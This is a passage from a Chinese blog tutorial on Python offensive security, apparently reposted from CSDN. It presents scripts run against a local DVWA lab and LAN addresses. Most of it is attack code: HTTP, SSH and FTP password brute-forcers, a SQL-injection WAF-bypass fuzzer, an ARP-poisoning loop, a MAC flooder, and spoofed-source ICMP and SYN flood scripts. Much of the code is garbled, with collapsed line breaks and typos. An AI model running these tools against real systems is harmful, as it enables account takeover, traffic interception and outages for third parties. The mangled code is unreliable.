    dictionaryFile =[]
    main(dictionaryFile)

在这里插入图片描述

Python后台弱口令爆破

🐵🐵🐵🐵🐵🐵🐵🐵弱口令🇾🇾🇩🇸🐵🐵🐵🐵🐵🐵🐵🐵

在这里插入图片描述

DVWA靶场 根据返回数据包的不同---💣成功与否,关键在于📕是否强大
import requests

defget_user(user):
    a =open('username.txt','r')for i in a:
        user.append(i.strip())defget_psd(psd):
    b =open('password.txt','r')for i in b:
        psd.append(i.strip())defmain():
    cookiesDit ={'security':'low','PHPSESSID':'ridh5ntp6u7ua2lisb1469c2r4'}for c in user:for d in psd:
            url ='http://127.0.0.1/dvwa/vulnerabilities/brute/?username={}&password={}&Login=Login'.format(c,d)
            responses = requests.get(url,cookies=cookiesDit)if'Welcome to the password'in responses.text:print("success!!! 用户名:{},密码:{}".format(c,d))if __name__ =='__main__':
    user =[]
    get_user(user)   

    psd =[]
    get_psd(psd)

    main()

在这里插入图片描述

SSH暴力破解

SSH(SecureShell)是目前较可靠、专为远程登录会话和其他网络服务提供安全性的协议,主要用于给远程登录会话数据进行加密,保证数据传输的安全。🇸SH口令长度太短或者复杂度不够,如仅包含数字🔢或仅包含字母🔤等时,容易被🤺攻击者破解。口令—旦被🤺攻击者获取,将可用来直接登录系统,控制服务器的所有权限!

SSH主要应用于类UNIX系统中,从客户端来看, SSH提供两种级别的安全验证:1️基于密码的安全验证、2️⃣基于密钥🗝️的安全验证.
from pexpect import pxssh
import optparse
from threading import*

Max_Connect =5
connection_lock = BoundedSemaphore(value=Max_Connect)#  BoundedSemaphore 限制多进程访问defconnect(host, user, password):try:
        s = pxssh.pxssh()#pxssh不支持Windows
        s.login(host, user, password)print("[+]Password Found:"+password)
        Found =Trueexcept Exception as e:passdefmain():
    parser = optparse.OptionParser('usage %prog -H <target host> -f <passwd file> -u <username>')
    parser.add_option('-H', dest='host',type='string',help='target host')
    parser.add_option('-f', dest='passwdfile',type='string',help='passwofile')
    parser.add_option('-u', dest='user',type='string',help='login username')(options,args)= parser.parse_args()
    host = options.host
    passwdfile = options.passwdfile
    user = options.user
    if host==Noneor passwdfile==Noneor user==None:print(parser.usage)
        exit(0)
    mn =open(passwdfile,'r')
    lines = mn.readlines()for line in lines:with connection_lock:
            password = line.strip('\n')print('[-] Test:'+str(password))
            t = Thread(target=connect,args=(host, user, password))
            t.start()if __name__ =='__main__':
    main()

在这里插入图片描述

FTP暴力破解

1️FTP是一个文件传输协议,用户通过🇫TP可从客户机程序向远程主机上传或下载文件,常用于网站代码维护、日常源码备份等。如果攻击者🤺通过🇫TP匿名访问或者通过弱口令破解获取FTP权限,将可直接上传📤WebShell来进一步渗透提权,直至控制整个网站服务器。

2️FTP是基于🇹CP的,🇫TP的命令端口为21,数据端口为20。🇫TP的任务是将一台💻的文件传送到另一台💻上。在使用🇫TP前需要进行身份验证,验证通过后才能获得相应的权限。

在这里插入图片描述

import ftplib

# 检查FTP是否允许匿名账户登录defCheckFTP_login(hostname):
    f = ftplib.FTP(hostname)try:print('[-] checking user [anonymous] with password [anonymous]')
        f.connect(hostname,21,timeout=10)
        f.login()print("\n[+] Credentials have found succcessfully.")print("\n[+] Username:anonymous")print("\n[+] Password:anonymous")print("success!!!username:{},password:{}".format("anonymous","anonymous"))
        f.quit()except ftplib.all_errors:print("\n[+] Anonymous login is prohibited!!!")pass# 爆破用户名和密码defviolence_Login(hostname):
    ftp=ftplib.FTP(hostname)

    u=open('ftp_user.txt','r')
    lines_user=u.readlines()
    usernameList =[]for m in lines_user:
        usernameList=[' '.join([n.strip()for n in usr.strip().split('\t')])for usr in lines_user]
    
    p=open('ftp_pwd.txt','r')
    lines_psd=p.readlines()
    passwordList =[]for m in lines_psd:
        passwordList=[' '.join([n.strip()for n in psd.strip().split('\t')])for psd in lines_psd]for user in usernameList:for pasw in passwordList:try:if ftp.login(user,pasw):print("\n[+] success!!! username:{},password:{}".format(user,pasw))
                    ftp.quit()except:pass

CheckFTP_login('192.168.12.131')
violence_Login('192.168.12.131')
1️⃣允许匿名登录

在这里插入图片描述在这里插入图片描述

2️⃣禁止匿名登录

在这里插入图片描述

八、Fuzz测试

FUZZ在渗透测试中应用广泛,可以用于硬件测试软件测试、安全测试等,是一种高效的、能快速检查潜在安全威胁的技术。

Python绕过安全狗

安全狗版本为v4.0 Apache版 + 本地DVWA-SQL Injection

在这里插入图片描述

常见的绕过安全🐶的方式有4种:利用string绕过、利用User-agent绕过、利用MySQL语法和html的特殊性绕过、利用畸形数据包绕过。
判断返回的页面是否为安全🐶拦截显示的页面,使用页面中返回的

攻击请求

进行判断,不存在这4个字,则表示已经绕过了安全狗。
import requests
import sys
 
fuzz_x =['/*','*/','/*!','/**/','?','/','*','=','`','!','@','%','_','-','+','|','%00']
fuzz_y =['',' ']
fuzz_z =["%0a","%0b","%0c","%0d","%0e","%0f","%0g"]

fuzz = fuzz_x+fuzz_y+fuzz_z
headers ={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36","Cookie":"security=low; PHPSESSID=6l0tittmdhgtpiktaffs9rqnvp"}
url_start ="http://192.168.12.131/dvwa/vulnerabilities/sqli/?id=1"len=len(fuzz)**3
num =0#组合for a in fuzz:for b in fuzz:for c in fuzz:
            num +=1

            payload ="'/**//*!*/and/*!*/"+a+b+c+"/**/'1'='1"
            url = url_start + payload+"&Submit=Submit#"
            sys.stdout.write(' '*30+'\r')
            sys.stdout.flush()print("Now URL:"+url)
            sys.stdout.write("完成进度:%s/%s \r"%(num,len))
            sys.stdout.flush()
            res = requests.get(url = url,headers = headers)if"攻击请求"notin res.text:print("\033[0;33m[*]Find BypassWAF Payload:\033[0m"+url)

在这里插入图片描述

🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌
在这里插入图片描述

九、Scapy进劫

ARP毒化

ARP(地址解析协议)数据链路层的协议,主要负责根据网络层地址(ip)来获取数据链路层地址(MAC)。

ARP毒化虽然是一种比较老的渗透测试技术,但是在信息搜集方面能发挥出很不错的效果.通过ARP毒化技术分析并提取内网流量中的敏感信息,往往会有许多意外的"收获"。

以太网协议规定,同—局域网中的一台💻要和另一台💻进行直接通信,必须知道目标主机的MAC地址。而在TCP/IP中,网络层只关注目标主机的IP地址,这就导致在以太网中使用IP协议时,数据链路层的以太网协议接收到网络层的IP协议提供的数据中,只包含目的主机的IP地址,于是需要ARP来完成IP地址到MAC地址的转换。
ARP是建立在网络中各个主机互相信任的基础上的,主机接收到ARP应答报文时不会检测该报文的真实性,而直接将报文中的IP和MAC记入其ARP缓存表。如果ARP缓存表中有相同的地址项,则会对其进行更新。由此,攻击者🤺可以向受害主机发送伪ARP应答包,毒化受害主机的ARP缓存表。
kali的IP地址:192.168.12.128 MAC地址为:00:0c:29:c5:a5:bb
目标网关的IP地址:192.168.12.2 MAC地址为:00:50:56:e6:e8:7d
毒化前

在这里插入图片描述
在这里插入图片描述

# ARP毒化脚本from scapy.allimport*import re 
import time
import sys
import os
import optparse

# 编写ARP毒化函数,对目标主机以及网关不断发送ARP应答包来不断毒化defpoison(targetIP,gatewayIP,ifname):# 毒化主机的MAC地址
    targetMAC ="00:0c:29:c5:a5:bb"# 网关的MAC地址
    gatewayMAC ="00:50:56:e6:e8:7d"if targetMAC and gatewayMAC:# 用while持续毒化whileTrue:# 对目标主机进行毒化

            sendp(Ether(src=lmac,dst=targetMAC)/ARP(hwsrc=lmac,hwdst=targetMAC,psrc=gatewayIP,pdst=targetIP,op=2),iface=ifname,verbose=False)#对网关进行毒化
            sendp(Ether(src=lmac,dst=gatewayMAC)/ARP(hwsrc=lmac,hwdst=gatewayMAC,psrc=targetIP,pdst=gatewayIP,op=2),iface=ifname,verbose=False)

            time.sleep(1)else:print("目标主机/网关主机IP有误,请检查!")
        sys.exit(0)# 编写main函数,添加相关参数以及开启系统路由转发功能if __name__ =='__main__':
    parser = optparse.OptionParser('usage:python %prog -r targetIP -g gatewayIP -i iface \n\n')# 添加目标主机参数 -r
    parser.add_option('-r','--rhost',dest='rhost',default='192.168.12.1',type='string',help='target host')# 添加网关参数 -g
    parser.add_option('-g','--gateway',dest='gateway',default='192.168.1.254',type='string',help='target gateway')# 添加网卡参数 -i
    parser.add_option('-i','--iface',dest='iface',default='eth0',type='string',help='interfaces name')(options,args)= parser.parse_args()
    lmac = get_if_hwaddr(options.iface)
    lip = get_if_addr(options.iface)print("===开始进行ARP毒化===")try:
        poison(options.rhost,options.gateway,options.iface)except KeyboardInterrupt:print("===停止ARP毒化")print("===停止路由转发功能===")
        os.system("echo 1 >> /proc/sys/net/ipv4/ip_forward")
        os.system("sysct1 net.ipv4.ip_forward")
毒化后

在这里插入图片描述
在这里插入图片描述

Dos

拒绝服务攻击(DenialofServjce,DoS)使计算机或网络无法提供正常的服务,是黑客常用的攻击🤺手段之—。常见的DoS攻击🤺包括计算机网络带宽攻击和连通性攻击两种类型。
带宽攻击是指以极大的通信量冲击网络,使得所有可用网络资源都被消耗殆尽,最后导致合法的用户请求无法通过。
连通性攻击指用大量的连接请求冲击计算机,使得所有可用的操作系统资源都被消耗殆尽,最终导致计算机无法再处理合法的用户请求。

常用的拒绝服务攻击🤺手段包括:
同步洪流、WinNuke、死亡之PING、Echl攻击、ICMP/SMURF、Finger炸弹、Land攻击、Ping洪流、Rwhod、tearDrop、TARGA3、UDP攻击、OOB等。实际上拒绝服务攻击🤺并不是一个攻击🤺方式,而是指一类具有相似特征的攻击🤺方式。黑客可能会利用TCP/IP协议层中的数据链路层网络层传输层应用层各种协议漏洞发起拒绝服务攻击🤺。

数据链路层Dos-MAC泛洪攻击

数据链路层的拒绝服务攻击其实就是通过伪造请求主机的MAC地址信息,使得交换机内部CAM短时间填满,失去交换机本身的记忆功能,退化成集线器,当接收到正常数据包时,会将全部数据以广播的形式发送出去。此时若攻击者🤺将自己的主机设置为混杂模式,就可以监听网络中的其他主机接收的数据了。

当路由器接收到包含随机生成的IP地址和MAC地址的数据包时,交换机查询CAM,若不存在该信息,就会不断进行记录。短时间内’大量请求会导致CAM被填满,失去交换机原有的功能。
from scapy.allimport*import optparse

defattack(interface):
    pkt =Ether(src=RandMAC(),dst=RandMAC())/IP(src=RandIP(),dst=RandIP())/ICMP()
    sendp(pkt,iface=interface)defmain():
    parser =optparse.OptionParser("%prog "+"-i interface")

    parser.add_option('-i',dest='interface',default='eth0',type='string',help='Interface')(options,args)=parser.parse_args()
    interface = options.interface
    try:whileTrue:
            attack(interface)except KeyboardInterrupt:print('--------------------')print('Finished!')if __name__ =='__main__':
    main()
wireshark

在这里插入图片描述

网络层Dos-死亡之Ping

控制多个僵尸主机一同向目标主机发送数据时,会出现"死亡之ping",使目标主机岩机.
import sys
from scapy.allimport*defstart(argv):iflen(sys.argv)<2:print(sys.argv[0]+" <target_ip>")
        sys.exit(0)
    psrc ="6.6.6.6"whileTrue:
        pdst = sys.argv[1]
        send(IP(src=psrc,dst=pdst)/ICMP())
s
if __name__ =='__main__':# 定义异常try:
        start(sys.argv[1:])except KeyboardInterrupt:print("interrupted by user,killing all threads....")

在这里插入图片描述

传输层Dos-SYN拒绝服务攻击

1️⃣攻击者向目标计算机发送一个TCP SYN报文。
2️⃣目标计算机收到这个报文后,建立TCP连接控制结构,并回应一个ACK,等待发起者的回应。
3️⃣发起者则不向目标计算机回应ACK报文,这样导致目标计算机一直处于等待状态。

import sys
from scapy.allimport*defstart(argv):iflen(sys.argv)<2:print(sys.argv[0]+" <target_ip")
        sys.exit(0)
    psrc ='6.6.6.6'whileTrue:
        pdst =sys.argv[1]
        send(IP(src=psrc,dst=pdst)/TCP(dport=443,flag='S'))if __name__ =='__main__':# 定义异常try:
        start(sys.argv[1:])except KeyboardInterrupt:print("interrupted by user, killing all threads......")

在这里插入图片描述

应用层Dos-Slowloris攻击

位于应用层的协议有很多,常见的包括HTTP、FTP、DNS、DHCP等。
其中应用层中的每一个协议都有可能被用来发起拒绝服务攻击。不同于其他层,应用层拒绝服务攻击已经完成了TCP的三次握手,建立起了连接,所以发起攻击🤺的IP地址都是真实的。常见的应用层拒绝服务攻击有CC(ChallengeCollapasar)攻击、Slowloris攻击、ServerLimitDOS等。

Slowloris攻击

以极低的速度向服务器发送HTTP请求。由于WebServer对于并发的连接数都有一定的上限,因此若恶意地占用这些连接不释放,那么WebServe的所有连接都将被恶意连接占用,从而无法接受新的请求,导致拒绝服务。
pip install slowloris

安装
在这里插入图片描述

防御策略

1️⃣关闭不需要的服务和端口,实现服务最小化,让服务器提供专门服务。
2️⃣安装查杀病毒的软硬件产品,及时更新病毒库。尽量避免因为软件漏洞而引起的拒绝服务,定期扫描现有的主机和网络节点,对安全漏洞和不规范的安全配置进行及时整改,对先前的漏洞及时打补丁。
3️⃣经常检测网络和主机的脆弱性,查看网上漏洞数据库,以减少或避免主机成为肉鸡的可能性。
4️⃣建立多节点的负载均衡,配备高于业务需求的带宽,建立多个网络出口,提高服务器的运算能力。

十、完结

🚶🚶🚶🚶🚶🚶🚶来来回回写了两星期⏰了,边学📚️边写✍️,🥦归🥦,收获很多。

明天大年初一🧨,给CSDN的大佬们拜个年🧧🧧🧧

本人一名小小的网络安全爱好者,如若文章有错误和不妥之处,敬请大佬们请教指正

标签: python 安全 网络

本文转载自: https://blog.csdn.net/ZXT2804567059/article/details/122362443
版权归原作者 {Yasso} 所有, 如有侵权,请联系我们删除。

“Python安全攻防-从入门到入狱”的评论:

还没有评论